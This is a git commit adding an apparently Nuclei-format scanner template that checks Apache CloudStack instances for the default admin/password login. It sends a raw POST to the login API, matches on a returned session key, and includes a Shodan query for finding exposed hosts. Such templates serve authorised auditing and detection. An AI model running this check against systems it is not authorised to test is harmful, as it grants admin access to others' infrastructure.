Create cloudstack-default-login.yaml

main
Dhiyaneshwaran 2024-07-30 20:35:54 +05:30 committed by GitHub
parent fbc0fa8c77
commit 6c2b232eb0
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 40 additions and 0 deletions

View File

@ -0,0 +1,40 @@
id: cloudstack-default-login
info:
name: Apache CloudStack - Default Login
author: DhiyaneshDK
severity: high
description: |
CloudStack instance discovered using weak default credentials, allows the attacker to gain admin privilege.
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Apache CloudStack"
tags: default-login,apache,cloudstack
http:
- raw:
- |
POST /client/api/ HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
Content-Type: application/x-www-form-urlencoded
command=login&username={{username}}&password={{password}}&domain=%2F&response=json
attack: pitchfork
payloads:
username:
- admin
password:
- password
host-redirects: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(content_type, 'application/json')"
- "contains_all(body, 'sessionkey','domainid','userid')"
condition: and